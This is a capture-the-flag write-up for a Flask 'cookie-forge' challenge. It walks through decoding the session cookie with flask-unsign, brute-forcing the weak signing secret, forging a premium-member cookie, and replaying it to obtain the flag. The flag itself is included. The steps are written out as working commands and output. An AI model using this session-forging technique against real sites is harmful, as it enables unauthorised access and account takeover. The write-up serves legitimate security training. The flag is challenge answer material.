Rating:
The website is using flask. A page is reserved for premium member.
We know that flask cookie have some issues.
We place an order. Login as toto:toto get the cookie and pass it to flask-unsign. The tool can decode it as the secret is only use to sign the cookie.
```
$flask-unsign -d -c 'eyJmbGFnc2hpcCI6ZmFsc2UsInVzZXJuYW1lIjoidG90byJ9.Xp2SeA.1l6nDFaIsDZ8bCXcxdtORRVIBK0'
{'flagship': False, 'username': 'toto'}
```
We need to get the secret to forge our own cookie
```
$ flask-unsign --server https://cookie-forge.cha.hackpack.club/orders --unsign
[*] Server returned HTTP 302 (Found)
[+] Successfully obtained session cookie: eyJfZmxhc2hlcyI6W3siIHQiOlsid2FybmluZyIsIllvdSBtdXN0IGxvZyBpbiBmaXJzdCEiXX1dfQ.Xp2TwA.IiGnkGfSx0j-O_vLTjmUyU95zLQ
[*] Session decodes to: {'_flashes': [('warning', 'You must log in first!')]}
[*] No wordlist selected, falling back to default wordlist..
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 39090 attempts
'password1'
```
We modify the flagship value and sign our cookie with the secret password1
```
$ flask-unsign --sign --secret password1 --cookie "{'flagship': True, 'username': 'toto'}"
eyJmbGFnc2hpcCI6dHJ1ZSwidXNlcm5hbWUiOiJ0b3RvIn0.Xp2TRQ.XlXCKJYANDb9ghp5ms_fKQhTkVY
```
Using Burp repeater we modify our cookie to get the flag
```
GET /flag HTTP/1.1
Host: cookie-forge.cha.hackpack.club
Cookie: session=eyJmbGFnc2hpcCI6dHJ1ZSwidXNlcm5hbWUiOiJ0b3RvIn0.Xp2TRQ.XlXCKJYANDb9ghp5ms_fKQhTkVY
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Content-Length: 2617
Content-Type: text/html; charset=utf-8
Date: Mon, 20 Apr 2020 12:26:22 GMT
Server: meinheld/1.0.1
Vary: Cookie
<SNIP>
You are a <em>special</em> customer!
To come back for more, sugar-coma after sugar-coma, in the face of mounting pressure from your doctors,
your family, and your own common senseā¦
That's dedication.
Just to show our appreciation for your morbid commitment to our life-altering products, we're giving you this flag:
flag{0h_my_@ch1ng_p@ncre@5_th33$3_@r3_d3l1c10$0}
